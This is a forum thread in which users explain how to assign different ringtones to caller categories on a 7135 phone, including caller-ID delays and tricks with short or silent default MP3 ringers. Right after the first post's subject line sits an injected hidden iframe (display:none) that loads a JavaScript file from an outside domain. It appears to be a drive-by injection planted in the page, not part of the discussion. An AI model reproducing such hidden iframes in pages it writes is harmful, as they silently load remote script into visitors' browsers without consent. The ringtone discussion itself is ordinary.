+ Reply to Thread

Ringtone Question - Can you use different ringtones for different callers?

The Subject line says it all<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes you can. In "phone prefs" you can set it to "ring by category". If you actually want a different ring for each individual person, you would have to create a category for them. I don't know what the limit on categories is. I use "ring by category" with about 7 different categories and really like that feature.
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    Yes you can. In "phone prefs" you can set it to "ring by category". If you actually want a different ring for each individual person, you would have to create a category for them. I don't know what the limit on categories is. I use "ring by category" with about 7 different categories and really like that feature.
    A couple of limitations to be aware of.
    1) The first ring will be your default ring. It takes one ring cycle for the 7135 to search the addresbook and match up the catagories. This is actually a limitation of CallerID in general, and not the 7135 in specific. CallerID is transmitted by the carrier after it alerts the phone of an incoming call. On landlines, it is actually sent after the first application of ring voltage. A little different on cell phones and ISDN lines, but the operating theory is similar.

2) If you have Voice Answer activated, and either have a headset plugged in or the phone in the car kit, you will get the voice prompt instead of the first two ring cycles, but if you ignore the prompt and the phone starts to ring, it will be your default ring, not your catagory ring.

Alan

I suppose you could make a silent ring your default and that would overcome the obstacle of having two different rings for the phone. Before I post a seperate topic, has anyone reading this found a ringtone or mp3 of an old fashioned landline phone ring? The kind from 10 or 20 years ago?

Originally posted by alanb
    A couple of limitations to be aware of.
    1) The first ring will be your default ring. It takes one ring cycle for the 7135 to search the addresbook and match up the catagories. This is actually a limitation of CallerID in general, and not the 7135 in specific. CallerID is transmitted by the carrier after it alerts the phone of an incoming call. On landlines, it is actually sent after the first application of ring voltage. A little different on cell phones and ISDN lines, but the operating theory is similar.

2) If you have Voice Answer activated, and either have a headset plugged in or the phone in the car kit, you will get the voice prompt instead of the first two ring cycles, but if you ignore the prompt and the phone starts to ring, it will be your default ring, not your catagory ring.

Alan

Originally posted by nboeck
    I suppose you could make a silent ring your default and that would overcome the obstacle of having two different rings for the phone. Before I post a seperate topic, has anyone reading this found a ringtone or mp3 of an old fashioned landline phone ring? The kind from 10 or 20 years ago?
    I actually like hearing about a second of my Seinfeld theme ringer before the right one kicks in

p.s. Before you post a separate topic, please browse through the 7135 Files Section forum. Every MP3 ringer that anyone here has made available for the other members is there... and I'm 99.999% sure that there are a several old fashioned ringers.

Of course, if your default ring is silent, and you get a call that is not in your address book, your phone won't ring.....

Alan

Of course, if your default ring is silent, and you get a call that is not in your address book, your phone won't ring.....

Alan
    I suppose that, if he wanted to go to the trouble, he could make a default ring that is silent for the first couple seconds or so

I suppose that, if he wanted to go to the trouble, he could make a default ring that is silent for the first couple seconds or so
    yes, but once you start an MP3 ringer playing, it will play to the end of the MP3 before switching to the catagory ring, so that wouldn't really help.....

I just use the Star Trek commhail ringer (posted to the files section) as my default, because it is fairly innocuos to anyone who heres it, and those who recognize it get a chuckle, and it is fairly short. Then the catagory ringer kicks in on the next ring cycle.

Alan

He (me) could make a few second long mp3. Wouldn't that work?

yes, but once you start an MP3 ringer playing, it will play to the end of the MP3 before switching to the catagory ring, so that wouldn't really help.....

I just use the Star Trek commhail ringer (posted to the files section) as my default, because it is fairly innocuos to anyone who heres it, and those who recognize it get a chuckle, and it is fairly short. Then the catagory ringer kicks in on the next ring cycle.

Alan

He (me) could make a few second long mp3. Wouldn't that work?
    He (you) could try various different things, and, with the assistance of a 2nd phone*, could keep calling himself (yourself) until he (you) likes the results.

In my particular case I have the Seinfeld theme as my default (10 seconds long, 1 second of silence between cycles) for calls not in my address book. When I call myself from my other phone I get the Seinfeld theme for 2 seconds, 1 second of silence, and then my LOTR ringer kicks in**.

* Simulate unknown numbers with *67, if necessary.
    ** Times are approximate (I timed it by looking at the display of the 2nd phone during this 1 minute experiment).

He (you) could try various different things, and, with the assistance of a 2nd phone*, could keep calling himself (yourself) until he (you) likes the results.

In my particular case I have the Seinfeld theme as my default (10 seconds long, 1 second of silence between cycles) for calls not in my address book. When I call myself from my other phone I get the Seinfeld theme for 2 seconds, 1 second of silence, and then my LOTR ringer kicks in**.

* Simulate unknown numbers with *67, if necessary.
    ** Times are approximate (I timed it by looking at the display of the 2nd phone during this 1 minute experiment).
    Looks like I was wrong. My default ring is only a few seconds long, so it plays all the way through before switching over. I guess with a longer one, it will cut off when the phone recognizes a catagory. so it appears that a few seconds of silence, followed by whatever you want as your default ringer would be effective.

Sorry to mislead....

Alan